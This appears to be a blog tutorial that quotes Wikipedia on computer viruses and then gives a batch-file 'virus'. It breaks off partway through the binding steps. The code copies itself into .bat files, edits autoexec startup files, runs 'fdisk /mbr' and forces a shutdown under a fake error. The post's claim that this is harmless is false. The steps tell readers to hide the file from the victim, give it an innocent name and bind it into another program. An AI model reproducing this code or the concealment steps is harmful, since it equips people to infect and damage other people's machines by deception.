What Is A Virus?
A computer virus is a computer program that can copy itself and infect a computer. The term “virus” is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.(Source Wikipedia)
As stated above, the term “computer virus” is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses. Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can exploit security vulnerabilities to spread itself automatically to other computers through networks, while a Trojan is a program that appears harmless but hides malicious functions. Worms and Trojans, like viruses, may harm a computer system’s data or performance. Some viruses and other malware have symptoms noticeable to the computer user, but many are surreptitious and go unnoticed.(Source Wikipedia)
Understand the following: It’s just a harmless “virus”. It only prints some scary messages and finally shuts down the computer. As you start it again, your computer will work as it did before!
Read the virus: Below you see the Computer-Code that is executed as you start the virus. The lines that start with REM are comments that the computer ignores. The explain you what the above line does.
@echo off
title %0
rem conditional check.
echo welcome to this wonderful program! please wait while I delete all your files!
rem infection of the user
copy %0 c:\tmp.bat >null attrib +r +s +h c:\tmp.bat echo for %%i in (*.bat) do copy c:\tmp.bat+%%i %%i >>c:\windows\system32\autoexec.NT
echo echo virus detected! >>c:\windows\system32\autoexec.NT
echo pause >>c:\windows\system32\autoexec.NT
echo NT core:infected!
echo echo shame on you! >>c:\autoexec.bat
echo echo system hault-virus identified! >>c:\autoexec.bat
echo chkdsk >>c:\autoexec.bat
echo i t i s t o o l a t e, y o u h a v e a v i r u s, n o w u r l i f e i s n o t b e a u t i f u l
fdisk /mbr
shutdown -s -t 03 -c “windows has shut down because the lsass service has incountered a write fault at 0×00000000000000000000000000000000000″
Code Details
@echo off
color 1a (Changes the colour)
echo (Displays a text)
echo: (leaves a line)
ping -n 2 127.0.0.1>nul (pings your localhost – nothing much)
shutdown.exe (shutdown)
Preparing the Virus
1.Read and understand the warnings!
2.Open up Notepad in Windows. You can do this by navigating to Start > Programs > Accessories > Notepad, or simply by entering notepad under Start > Run.
3.Copy and Paste the Code of the “virus” into Notepad
4.Click File -> Save as
5.Decide for a location to save the fake-virus. You should chose a location where the user won’t find the file, so saving it on the desktop would be a bad idea!
6.Change “.txt” to “All files” in the file type drop-down menu
7.Chose a harmless filename. Replace the “.txt” at the with “.bat”
8.Click on save and close Notepad.
Now We Have Completed Making The Virus And Now We Must Bind The Virus With Any Other FileLike This:-
Quick Definition of Binder-
A binder is a software utility that combines two or more files into a single file. To bind files, the user selects a list of files to be put into a host file and the host file, which can be renamed anything the user would like, compresses the selected files and saves them all in one place under one name. When the user clicks on the host file, the embedded files are automatically decompressed and, if they contain an application (that is, if the package includes an executable file), the application is run.
Let’s start Binding!
Okay first we will need a good binder that gets the job done!
I prefer using “Sh!t Binder” you can find it here!
Download Shit Binder
Okay save it and extract it to the desktop or in a folder, Doesn’t matter.
Now, Get the two programs you want to be
Post a Comment